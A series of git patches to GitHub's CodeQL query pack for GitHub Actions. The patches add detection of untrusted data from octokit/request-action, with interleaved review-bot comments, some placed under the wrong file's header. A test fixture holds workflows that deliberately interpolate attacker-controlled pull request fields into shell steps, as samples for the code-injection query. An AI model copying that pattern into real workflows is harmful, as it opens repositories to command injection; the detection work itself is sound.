.github/workflows/artifactpoisoning101.yml:16:9:19:59 | Run Step: pr_number | | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | From 09f1fd1a81814dd55d84f15134f302a82c6cbc34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 11:48:19 +0200 Subject: [PATCH 589/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 82891e5c0173..12cf4c6106a4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.67
+version: 0.1.68
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index fb4416ffb1d6..b10da74b7118 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.67
+version: 0.1.68
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From b072cfa1f7ee9959ad3423926850fadf44d98a66 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 17 Oct 2024 10:40:33 +0200
Subject: [PATCH 590/707] Add pwsh as the default shell for windows runners
---
 ql/lib/codeql/actions/ast/internal/Ast.qll | 10 ++++++--
 .../library-tests/.github/workflows/shell.yml | 23 +++++++++++++++++++
 2 files changed, 31 insertions(+), 2 deletions(-)
 create mode 100644 ql/test/library-tests/.github/workflows/shell.yml
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 7c433a39e620..67ef99e0fc87 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -1438,12 +1438,18 @@ class RunImpl extends StepImpl {
 /** Gets the shell for this `run` mapping. */
 string getShell() {
- if exists(n.lookup("shell").(YamlString).getValue())
+ if exists(n.lookup("shell"))
 then result = n.lookup("shell").(YamlString).getValue()
 else
 if exists(this.getInScopeDefaultValue("run", "shell"))
 then result = this.getInScopeDefaultValue("run", "shell").getValue()
- else result = "bash"
+ else
+ if this.getEnclosingJob().getARunsOnLabel().matches(["ubuntu%", "macos%"])
+ then result = "bash"
+ else
+ if this.getEnclosingJob().getARunsOnLabel().matches("windows%")
+ then result = "pwsh"
+ else result = "bash"
 }
 ShellScriptImpl getScript() { result = scriptScalar }
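Review bot: Widening the first guard to `exists(n.lookup("shell"))` means a `shell` key whose value is not a `YamlString` (an empty or non-scalar value, if the extractor can produce one for this key) now leaves `getShell()` without a result instead of falling through to the in-scope default and the runner-based defaults, and a Run step with no shell result is presumably dropped by `BashShellScript`, which matches on `run.getShell()`. If the intent was only to avoid evaluating `getValue()` in the condition, keeping the cast in the guard, `if exists(n.lookup("shell").(YamlString))`, preserves the fall-through. The final `else result = "bash"` also covers labels that are expressions or self-hosted names; a one-line comment such as `// expression or self-hosted label: assume a POSIX shell` would record that this is a deliberate default. The enclosing class RunImpl starts outside the hunk.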
diff --git a/ql/test/library-tests/.github/workflows/shell.yml b/ql/test/library-tests/.github/workflows/shell.yml
new file mode 100644
index 000000000000..9392b81c6ab2
--- /dev/null
+++ b/ql/test/library-tests/.github/workflows/shell.yml
@@ -0,0 +1,23 @@
+on: push
+
+jobs:
+ job1:
+ runs-on: ubuntu-latest
+ steps:
+ - shell: pwsh
+ run: Write-Output "foo"
+ job2:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "foo"
+
+ job3:
+ runs-on: windows-latest
+ steps:
+ - shell: bash
+ run: echo "foo"
+ job4:
+ runs-on: windows-latest
+ steps:
+ - run: Write-Output "foo"
+
From 6bf3eb79a9aa809bc38ead6ccf3687aaab4bdae3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 17 Oct 2024 10:44:43 +0200
Subject: [PATCH 591/707] Add sh as a bash-compatible POSIX shell
---
 ql/lib/codeql/actions/Bash.qll | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll
index 672f7727f5b5..c1e038069eb1 100644
--- a/ql/lib/codeql/actions/Bash.qll
+++ b/ql/lib/codeql/actions/Bash.qll
@@ -4,7 +4,7 @@ class BashShellScript extends ShellScript {
 BashShellScript() {
 exists(Run run |
 this = run.getScript() and
- run.getShell().matches("bash%")
+ run.getShell().matches(["bash%", "sh"])
 )
 }
From a1047d155c1d23668072a301aecad629574e3d74 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 17 Oct 2024 14:48:53 +0200
Subject: [PATCH 592/707] Add new control checks using octokit/request-action
---
 ql/lib/codeql/actions/security/ControlChecks.qll | 6 ++++++
 1 file changed, 6 insertions(+)
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll
index 3b15fc78d10a..760efaf5e7e6 100644
--- a/ql/lib/codeql/actions/security/ControlChecks.qll
+++ b/ql/lib/codeql/actions/security/ControlChecks.qll
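Review bot: `matches(["bash%", "sh"])` accepts only the literal string `sh`, so a step declaring `shell: sh -e {0}` (the custom-shell form that the `bash%` prefix already accommodates for bash) is not classified as a BashShellScript and is missed by every query built on that class. Making the two forms symmetric, `run.getShell().matches(["bash%", "sh", "sh %"])`, keeps `sh` exact while admitting the option-bearing variant without also matching unrelated shell names. The constructor is complete within the hunk; the class header is the hunk's context line.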
@@ -256,6 +256,9 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep {
 or
 this.getCallee() = "actions/github-script" and
 this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%")
+ or
+ this.getCallee() = "octokit/request-action" and
+ this.getArgument("route").regexpMatch("GET.*(memberships).*")
 }
 }
@@ -279,6 +282,9 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep {
 or
 this.getCallee() = "actions/github-script" and
 this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%")
+ or
+ this.getCallee() = "octokit/request-action" and
+ this.getArgument("route").regexpMatch("GET.*(collaborators|permission).*")
 }
 }
From 8323819504571d2fbfa1c83680009268f6dccafa Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 17 Oct 2024 15:51:00 +0200
Subject: [PATCH 593/707] New sources for octokit/request-action
---
 .../codeql/actions/dataflow/FlowSources.qll | 21 ++++++
 ql/lib/codeql/actions/dataflow/TaintSteps.qll | 36 ++++++++-
 .../CWE-094/.github/workflows/test17.yml | 74 +++++++++++++++++++
 .../CWE-094/CodeInjectionCritical.expected | 16 ++++
 .../CWE-094/CodeInjectionMedium.expected | 12 +++
 5 files changed, 158 insertions(+), 1 deletion(-)
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index a9967a72ee6e..b79a86ce27ac 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
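Review bot: In PermissionActionCheck the route pattern `GET.*(collaborators|permission).*` also accepts routes that only enumerate collaborators, such as `GET /repos/{owner}/{repo}/collaborators`, which establishes nothing about the triggering actor, and since `regexpMatch` matches the whole string the trailing `.*` and the capture group are redundant. Restricting the arm to the per-user endpoints, `this.getArgument("route").regexpMatch("GET.*/collaborators/[^/]+.*")`, ties the check to a specific user while still covering the `/permission` suffix; the AssociationActionCheck arm in the first hunk could likewise use `GET.*/memberships/.*` so that a bare listing route is not treated as a membership check. Both enclosing classes start outside their hunks.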
@@ -295,3 +295,24 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource {
 override string getSourceType() { result = "text" }
 }
+
+class OctokitRequestActionSource extends RemoteFlowSource {
+ OctokitRequestActionSource() {
+ exists(UsesStep u, string route |
+ u.getCallee() = "octokit/request-action" and
+ route = u.getArgument("route").trim() and
+ route.indexOf("GET") = 0 and
+ (
+ route.matches("%/commits%") or
+ route.matches("%/comments%") or
+ route.matches("%/pulls%") or
+ route.matches("%/issues%") or
+ route.matches("%/users%") or
+ route.matches("%github.event.issue.pull_request.url%")
+ ) and
+ this.asExpr() = u
+ )
+ }
+
+ override string getSourceType() { result = "text" }
+}
diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll
index e9d5a44c929a..80858df909b6 100644
--- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll
+++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll
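Review bot: The new OctokitRequestActionSource has no QLDoc, although the taint step added for it in TaintSteps.qll in this same commit carries one; a class comment such as `/** The `data` output of an `octokit/request-action` step that fetches pull requests, issues, comments, commits or users, whose fields are authored by external users. */` would state why the step is a remote source. `route.indexOf("GET") = 0` is a case-sensitive prefix test that reads more directly as `route.matches("GET%")`. The route disjunction is a closed allow-list, so presumably GET routes for other user-authored content (releases, repository contents, search results) and non-GET routes that return the same fields are not sources; if that is a deliberate precision trade-off, a comment on the disjunction saying so would help the next maintainer.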
@@ -91,11 +91,45 @@ predicate xt0rtedSlashCommandActionTaintStep(DataFlow::Node pred, DataFlow::Node
 )
 }
+/**
+ * A read of user-controlled field of the octokit/request-action action.
+ */
+predicate octokitRequestActionTaintStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(StepsExpression o |
+ pred instanceof OctokitRequestActionSource and
+ o.getTarget() = pred.asExpr() and
+ o.getStepId() = pred.asExpr().(UsesStep).getId() and
+ succ.asExpr() = o and
+ (
+ not o instanceof JsonReferenceExpression and
+ o.getFieldName() = "data"
+ or
+ o instanceof JsonReferenceExpression and
+ o.(JsonReferenceExpression).getInnerExpression().matches("%.data") and
+ o.(JsonReferenceExpression)
+ .getAccessPath()
+ .matches([
+ "%.title",
+ "%.user.login",
+ "%.body",
+ "%.head.ref",
+ "%.head.repo.full_name",
+ "%.commit.author.email",
+ "%.commit.commiter.email",
+ "%.commit.message",
+ "%.email",
+ "%.name",
+ ])
+ )
+ )
+}
+
 class TaintSteps extends AdditionalTaintStep {
 override predicate step(DataFlow::Node node1, DataFlow::Node node2) {
 dornyPathsFilterTaintStep(node1, node2) or
 tjActionsChangedFilesTaintStep(node1, node2) or
 tjActionsVerifyChangedFilesTaintStep(node1, node2) or
- xt0rtedSlashCommandActionTaintStep(node1, node2)
+ xt0rtedSlashCommandActionTaintStep(node1, node2) or
+ octokitRequestActionTaintStep(node1, node2)
 }
 }
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml
new file mode 100644
index 000000000000..559c69c4710f
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test17.yml
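Review bot: `"%.commit.commiter.email"` misspells the REST field, which is `committer`, so the `.commit.committer.email` access path never matches and a workflow that reads the committer e-mail out of a commits response is not tracked; it should read `"%.commit.committer.email",`. The QLDoc is also slightly off: `* A read of a user-controlled field of the `data` output of the octokit/request-action action.` would say what the step connects. The `%.name` and `%.email` suffix patterns are broad and will also match fields such as `.base.repo.name` that the repository owner controls; that over-approximation is harmless for taint tracking but may be worth a one-line comment. The enclosing predicate xt0rtedSlashCommandActionTaintStep starts outside the hunk; octokitRequestActionTaintStep is complete within it.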
@@ -0,0 +1,74 @@ +name: Test + +on: + issue_comment: + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + runs-on: ubuntu-latest + steps: + - name: Get PR details + id: get-pr + if: github.event_name == 'issue_comment' + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository }}/pulls/${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Set PR source branch as env variable + if: github.event_name == 'issue_comment' + run: | + PR_SOURCE_BRANCH=$(echo '${{ steps.get-pr.outputs.data }}' | jq -r '.head.ref') + echo "BRANCH=$PR_SOURCE_BRANCH" >> $GITHUB_ENV + setup2: + runs-on: ubuntu-latest + steps: + - name: Get PR details + uses: octokit/request-action@v2.x + id: get-pr-details + with: + route: GET /repos/{repository}/pulls/{pull_number} + repository: ${{ github.repository }} + pull_number: ${{ github.event.issue.number }} + env: + GITHUB_TOKEN: ${{ secrets.GH_TOKEN }} + - name: Set environment variables + run: | + MERGE_STATUS=${{ fromJson(steps.get-pr-details.outputs.data).mergeable }} + if $MERGE_STATUS; then echo "COMMENT=\[Fast Forward CI\] ${{ env.HEAD_REF }} cannot be merged into ${{ env.BASE_REF }} at the moment." 
>> $GITHUB_ENV; fi + echo "MERGE_STATUS=$MERGE_STATUS" >> $GITHUB_ENV + echo "BASE_REF=${{ fromJson(steps.get-pr-details.outputs.data).base.ref }}" >> $GITHUB_ENV + echo "HEAD_REF=${{ fromJson(steps.get-pr-details.outputs.data).head.ref }}" >> $GITHUB_ENV + setup3: + runs-on: ubuntu-latest + steps: + - id: issues + uses: octokit/request-action@v2.x + with: + route: GET /repos/${{ github.repository_owner }}/${{ github.repository }}/issues?state=open + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN}} + - run: | + echo '${{ steps.issues.outputs.data }}' > issues.json + setup4: + runs-on: ubuntu-latest + steps: + - id: get-pull-request + uses: octokit/request-action@v2.x + with: + route: GET /repos/{owner}/{repo}/pulls/{pull_number} + owner: foo + repo: bar + pull_number: ${{ github.event.issue.number }} + + - run: >- + echo "Pull request title is \"${{ + fromJson(steps.get-pull-request.outputs.data).title }}\" but expected + \"Updated test pull request\"" && exit 1 + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 699d53da9cc1..1ad0d4987917 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -155,6 +155,10 @@ edges | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -472,6 +476,14 @@ nodes | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -623,6 +635,10 @@ subpaths | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 6d33d3cc5691..eb852fdd4d29 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -155,6 +155,10 @@ edges | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | 
@@ -472,6 +476,14 @@ nodes | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | semmle.label | Uses Step: get-pr | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | semmle.label | steps.get-pr.outputs.data | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | semmle.label | Uses Step: get-pr-details | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | semmle.label | fromJson(steps.get-pr-details.outputs.data).head.ref | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | semmle.label | Uses Step: issues | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | semmle.label | Uses Step: get-pull-request | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From c44c3bae9fffad54b3b72e3a2a7f0ccd4d1fcafd Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 21:39:58 +0200 Subject: [PATCH 594/707] Update tests --- ql/test/library-tests/commands.expected | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index 12092de34ef9..35305671cf05 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected @@ -195,6 +195,8 @@ | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | echo "foo" | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | From 7cba2e07bc232808a5dbc2ec08b044ec2d3c8097 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 17 Oct 2024 21:40:40 +0200 Subject: [PATCH 595/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 12cf4c6106a4..e5471e236511 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.68 +version: 0.1.69 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b10da74b7118..660f3287090c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.68 +version: 0.1.69 groups: [actions, queries] suites: codeql-suites extractor: javascript From 325727ed6dc6ccc0f7bd2e8ed70084a574f3c7f9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Thu, 17 Oct 2024 15:59:45 -0400 Subject: [PATCH 596/707] recommend to add octokit to trusted orgs --- ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 10c21bc368b5..2111cc118a97 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -18,7 +18,7 @@ private predicate isPinnedCommit(string version) { version.regexpMatch("^[A-Fa-f bindingset[repo] private predicate isTrustedOrg(string repo) { - exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) + exists(string org | org in ["actions", "github", "advanced-security", "octokit"] | repo.matches(org + "/%")) } from UsesStep uses, string repo, string version, Workflow workflow, string name From cf9b853a8fba8dac3be1f6d173caf4673edaed2c Mon Sep 17 00:00:00 2001 
